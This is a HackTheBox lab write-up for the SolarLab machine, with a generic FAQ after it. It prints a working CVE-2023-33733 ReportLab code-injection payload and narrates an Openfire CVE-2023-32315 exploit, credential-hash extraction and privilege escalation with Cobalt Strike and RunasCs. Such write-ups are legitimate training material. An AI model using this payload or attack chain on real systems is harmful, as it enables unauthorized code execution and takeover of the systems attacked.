In this walkthrough, I demonstrate how I obtained complete ownership of SolarLab on HackTheBox.
Lets Solve SolarLab HTB Writeup
SolarLab is a notable challenge within the HacktheBox community, demanding a comprehensive understanding of cybersecurity and penetration testing. By immersing ourselves in this hands-on experience, we gain invaluable insights into the real-world scenarios faced by ethical hackers in securing digital environments.
HTB SolarLab link: https://app.hackthebox.com/machines/SolarLab
Intelligence
Scan ports:
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to <http://solarlab.htb/>
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to <http://report.solarlab.htb:6791/>
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -21s
| smb2-time:
| date: 2024-05-13T16:13:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Add domains to / etc / hosts
echo "10.10.11.16 solarlab.htb" | sudo tee -a /etc/hosts
echo "10.10.11.16 report.solarlab.htb" | sudo tee -a /etc/hosts
We get to the satika:
User flag
We connect by smb to anonymous
Download the table with passwords
We log under the Blakeb user. We get here:
We stumble upon a PDF generator. We look at the metadata of the file. We see that the document is generated using the Report Lab PDF Library
Having found popular vulnerabilities on the Internet, we stumble upon CVE-2023-33733. This is a vulnerability in the ReportLab library associated with unsafe processing of input data, which allows an attacker to execute arbitrary code.
Read more here: https://github.com/c53elyas/CVE-2023-33733
PoC:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('Здесь мог бы быть ваш payload') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
Intercept the request in burpsuite, implement the payload
We get shell, read user-flag
Root flag
View open ports
We launch Cobaltstrike, where we generate SOCKS4 at port 57378. Alternatively to Cobalt, porting can be used https://github.com/Pokefenn/Chisel
Using proxychains check connection
Through FoxyProxy we get access to the local Web at 9090 port
We are met by the form of the Openfire login
We start MSF console by throwing all traffic through the captured car
We will use the exploit for CVE-2023-32315. He will create a new account for us and return the shell
Go to the database file directory
Find the Openfire database
We pull out the administrator hash
Broome with it OpenFireDecryptPass
Download to target car RunasCs.exe. It allows you to create a process on behalf of the administrator (if the password is known) with full privileges
Having previously downloaded openfire Shell.exe to the user’s desktop, run exe and catch it in cobalt
We read root-flag
FAQ
What is the SolarLab challenge on HacktheBox?
The SolarLab challenge on HacktheBox is a simulated cybersecurity challenge that tests participants’ hacking skills and knowledge. It presents a realistic scenario in which players must navigate through a virtual environment, identifying vulnerabilities, exploiting them, and escalating privileges to complete the challenge objectives.
What skills are required to tackle the SolarLab challenge?
Tackling the SolarLab challenge requires proficiency in various areas, including network reconnaissance, vulnerability scanning, exploit development, privilege escalation, and post-exploitation techniques. Participants must have a solid understanding of penetration testing methodologies, common hacking tools, and techniques to successfully navigate the challenge.
What is the initial reconnaissance phase in the SolarLab challenge?
The initial reconnaissance phase in the SolarLab challenge involves gathering information about the target network and infrastructure. Hackers leverage various methods and tools like port scanning, banner grabbing, and enumeration to identify potential entry points and understand the layout and technologies used in the SolarLab environment.
How is scanning and enumeration performed in the SolarLab challenge?
Scanning and enumeration in the SolarLab challenge involve using tools such as Nmap and enumeration scripts to identify open ports, services, and potential vulnerabilities. This phase helps hackers gather valuable information about the target system, including running services, software versions, and misconfigurations that may lead to exploitable vulnerabilities.
What is the process of exploiting vulnerabilities in the SolarLab challenge?
Exploiting vulnerabilities in the SolarLab challenge involves identifying and leveraging weaknesses within the target system or applications. Hackers may utilize exploit frameworks, custom scripts, or manual exploitation techniques to exploit vulnerabilities, gain unauthorized access, and achieve the desired objectives of the challenge.
How do you escalate privileges in the SolarLab challenge?
Privilege escalation in the SolarLab challenge involves elevating user privileges to gain access to restricted files, directories, or systems. Hackers make use of various techniques like exploiting misconfigurations, leveraging kernel vulnerabilities, and abusing weak access controls to escalate privileges within the target environment.
What is the post-exploitation phase in the SolarLab challenge?
The post-exploitation phase in the SolarLab challenge focuses on maintaining access, exfiltrating data, and exploring the compromised system. Hackers may set up backdoors, establish persistence mechanisms, perform lateral movement to other systems, or extract sensitive information to achieve the intended goals of the challenge.
How important is analysis and reporting in the SolarLab challenge?
Analysis and reporting play a crucial role in the SolarLab challenge as they enable hackers to document their findings, actions, and techniques used throughout the challenge. Proper analysis helps identify areas of improvement, while comprehensive reporting showcases the skills and knowledge gained during the hands-on experience, enhancing the ethical hacking and penetration testing capabilities of participants.
What can be learned from completing the SolarLab challenge?
Completing the SolarLab challenge provides valuable hands-on experience in various aspects of ethical hacking and penetration testing. Participants gain insights into real-world hacking scenarios, improve their technical skills, enhance their problem-solving abilities, and develop a deep understanding of secure system configurations and vulnerabilities that can be used to improve cybersecurity practices.
Pingback: BoardLight Writeup | BoardLight walkthrough HacktheBox - hackerhq.tech